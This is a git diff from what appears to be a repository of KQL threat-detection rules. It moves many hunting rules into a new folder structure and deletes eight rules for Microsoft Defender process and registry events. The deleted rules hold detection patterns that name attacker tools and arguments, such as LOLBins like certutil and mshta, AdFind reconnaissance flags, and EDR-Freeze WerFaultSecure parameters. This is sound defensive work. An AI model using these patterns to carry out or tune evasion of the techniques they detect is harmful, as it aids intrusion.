rename to KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql
diff --git a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql
rename to KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql
rename to KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql
diff --git a/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Discovery/net_exe_execution.kql
rename to KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
rename to KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql
diff --git a/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql b/KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql
rename to KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql
diff --git a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql
diff --git a/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql
diff --git a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql
diff --git a/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql
diff --git a/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql
diff --git a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql
rename to KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql
diff --git a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql
rename to KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql
diff --git a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql
rename to KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql
diff --git a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
rename to KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql
rename to KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
rename to KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
rename to KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
rename to KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
diff --git a/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql
rename to KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql
rename to KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql
diff --git a/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql
diff --git a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql
rename to KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql
diff --git a/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql b/KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql
rename to KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql
diff --git a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql
rename to KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql
diff --git a/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql
rename to KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql
diff --git a/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql b/KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql
rename to KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql
rename to KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql
diff --git a/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql
rename to KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql
diff --git a/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql b/KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
rename to KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql
diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql b/KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql
rename to KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql
diff --git a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql
rename to KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql
rename to KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
rename to KQL/rules-threat-hunting/windows/registry/registry_set/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql
diff --git a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql
rename to KQL/rules-threat-hunting/windows/registry/registry_set/service_binary_in_user_controlled_folder.kql
diff --git a/KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql
similarity index 100%
rename from KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql
rename to KQL/rules-threat-hunting/windows/registry/registry_set/shell_context_menu_command_tampering.kql
diff --git a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql
deleted file mode 100644
index 1eb1bf8c..00000000
--- a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Title: File Download From Browser Process Via Inline URL
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-11
-// Level: medium
-// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
deleted file mode 100644
index 545a01d6..00000000
--- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
+++ /dev/null
@@ -1,13 +0,0 @@
-// Title: RDP Sensitive Settings Changed
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022-08-06
-// Level: high
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1112
-// False Positives:
-// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
-
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql b/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
deleted file mode 100644
index 966b5909..00000000
--- a/KQL/rules/Defense Evasion/suspicious_process_suspension_via_werfaultsecure_through_edr_freeze.kql
+++ /dev/null
@@ -1,12 +0,0 @@
-// Title: Suspicious Process Suspension via WERFaultSecure through EDR-Freeze
-// Author: Jason (https://github.com/0xbcf)
-// Date: 2025-09-23
-// Level: high
-// Description: Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate usage of WerFaultSecure for debugging purposes
-
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql b/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql
deleted file mode 100644
index 5ba453f0..00000000
--- a/KQL/rules/Discovery/pua_adfind_suspicious_execution.kql
+++ /dev/null
@@ -1,12 +0,0 @@
-// Title: PUA - AdFind Suspicious Execution
-// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
-// Date: 2021-02-02
-// Level: high
-// Description: Detects AdFind execution with common flags seen used during attacks
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
-// False Positives:
-// - Legitimate admin activity
-
-DeviceProcessEvents
-| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql
deleted file mode 100644
index e2daa199..00000000
--- a/KQL/rules/Execution/filefix_command_evidence_in_typedpaths_from_browser_file_upload_abuse.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Title: FileFix - Command Evidence in TypedPaths from Browser File Upload Abuse
-// Author: Alfie Champion (delivr.to)
-// Date: 2025-07-05
-// Level: high
-// Description: Detects commonly-used chained commands and strings in the most recent 'url' value of the 'TypedPaths' key, which could be indicative of a user being targeted by the FileFix technique.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.004
-
-DeviceRegistryEvents
-| where (RegistryValueData contains "#" and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe") and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "cmd" or RegistryValueData contains "curl" or RegistryValueData contains "powershell" or RegistryValueData contains "bitsadmin" or RegistryValueData contains "certutil" or RegistryValueData contains "mshta" or RegistryValueData contains "regsvr32")
\ No newline at end of file
diff --git a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
deleted file mode 100644
index 57df535d..00000000
--- a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql
+++ /dev/null
@@ -1,14 +0,0 @@
-// Title: FileFix - Suspicious Child Process from Browser File Upload Abuse
-// Author: 0xFustang
-// Date: 2025-06-26
-// Level: high
-// Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique,
-// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.
-// The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204.004
-// False Positives:
-// - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools
-
-DeviceProcessEvents
-| where ProcessCommandLine contains "#" and (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
deleted file mode 100644
index 98e445c1..00000000
--- a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql
+++ /dev/null
@@ -1,13 +0,0 @@
-// Title: Fsutil Behavior Set SymlinkEvaluation
-// Author: frack113
-// Date: 2022-03-02
-// Level: medium
-// Description: A symbolic link is a type of file that contains a reference to another file.
-// This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
-| where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql
deleted file mode 100644
index 7b921e94..00000000
--- a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql
+++ /dev/null
@@ -1,12 +0,0 @@
-// Title: Potential Persistence Via New AMSI Providers - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Legitimate security products adding their own AMSI providers. Filter these according to your environment
-
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
deleted file mode 100644
index 71f6738d..00000000
--- a/KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
+++ /dev/null
@@ -1,12 +0,0 @@
-// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-24
-// Level: high
-// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1588.002
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith 
"\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe")))
\ No newline at end of file
